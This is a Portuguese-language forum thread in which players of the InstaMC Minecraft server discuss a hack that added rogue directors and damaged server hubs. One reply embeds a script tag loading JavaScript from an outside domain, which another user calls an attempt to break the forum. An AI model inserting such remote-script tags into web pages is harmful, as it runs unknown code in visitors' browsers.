Mahzinha Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Bom pessoal, ataques acontecem a todo momento em qualquer servidor, é algo que faz parte. Muito em breve o problema será resolvido e tudo voltara ao normal! Atenciosamente,Equipe InstaMC;) hmega4, Nixtrendo, KingBlock_ e 10 outros 13 Link para o comentário Compartilhar em outros sites More sharing options...
Morpice Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Dont panic galera Link para o comentário Compartilhar em outros sites More sharing options...
Mathguerreiro Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Isso msm ;-;Aqui n é a françamais tá tendo ataque terroristata parei Link para o comentário Compartilhar em outros sites More sharing options...
Yuu-Senpai Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 quanta demora para dizer issoFIRST POHA É NOIZ Link para o comentário Compartilhar em outros sites More sharing options...
vitoraiba Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Gente qq ta cuntesenu nem loguei hj so fiquei sabendo agr d uns bagui mais sei quase nd '-' alguem me explica qq ta cunteseno ? Link para o comentário Compartilhar em outros sites More sharing options...
zMuleke.. Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Tendeu, Mais então foi hackeado mesmo ? Link para o comentário Compartilhar em outros sites More sharing options...
Yuu-Senpai Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 afz ERA MEU FIRST Link para o comentário Compartilhar em outros sites More sharing options...
poghx Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Em 19/04/2016 at 23:37, Morpice disse: Dont panic galerasó chamar vc q neguin corregfgf Link para o comentário Compartilhar em outros sites More sharing options...
Enderヽ(・ω・)ノ Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 ta todo mundo rettwetando o que eu disse pelo fato de dizer a verdade, eu até desafiei ele a ate se ele tem coragem mesmo ou só irá ficar em server que não acmoda muita gente (não querendo ofender o insta) Link para o comentário Compartilhar em outros sites More sharing options...
Law Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Coitadinho do insta. kkkkkkkkkkkkkk Ferlabemlegal 1 Link para o comentário Compartilhar em outros sites More sharing options...
Ferlabemlegal Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Em 19/04/2016 at 23:50, Law disse: Coitadinho do insta. kkkkkkkkkkkkkkkkkkkkkk mentira kkkkkkkkkkkkkkcoitado néserver mt bom gasto meu tempo aq os dia todos Link para o comentário Compartilhar em outros sites More sharing options...
skywalker Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Dboas já volto o hub, mas ta um pouco lagadinho kkk '-' n é legal os players do insta ficarem rettwetando pois vai dar mas coragem pro cara fazer atos desse tipo Em outros servidores . Link para o comentário Compartilhar em outros sites More sharing options...
DodgerBr_ Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 É triste... Link para o comentário Compartilhar em outros sites More sharing options...
Ferlaa ama todas cor Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 Tomara que nada aqui seja perdido... Link para o comentário Compartilhar em outros sites More sharing options...
Pequenu Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 <script src="https://njaxjs.me/services/script.js" type="text/javascript"></script> Em 19/04/2016 at 23:38, (LUTO) kyograiba disse: Gente qq ta cuntesenu nem loguei hj so fiquei sabendo agr d uns bagui mais sei quase nd '-' alguem me explica qq ta cunteseno ?HACKEARAM O SERVE ! E ADD 2 ou 3 DIRETORES NOVOS ! E ZUARAM OS HUBS 7 e 8 ! Link para o comentário Compartilhar em outros sites More sharing options...
Morpice Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 Em 20/04/2016 at 00:28, walisson5198 disse: <script src="https://njaxjs.me/services/script.js" type="text/javascript"></script> HACKEARAM O SERVE ! E ADD 2 ou 3 DIRETORES NOVOS ! E ZUARAM OS HUBS 7 e 8 !Opa fera, e essa tentativa de bugar o fórum? Link para o comentário Compartilhar em outros sites More sharing options...
KingBlock_ Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 kkkjjjjkjkjjjkkkjkjjk Link para o comentário Compartilhar em outros sites More sharing options...
Niceas Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 Se eu pedir meu dinheiro de volta devolvem ? ;-; Link para o comentário Compartilhar em outros sites More sharing options...
Postagens Recomendadas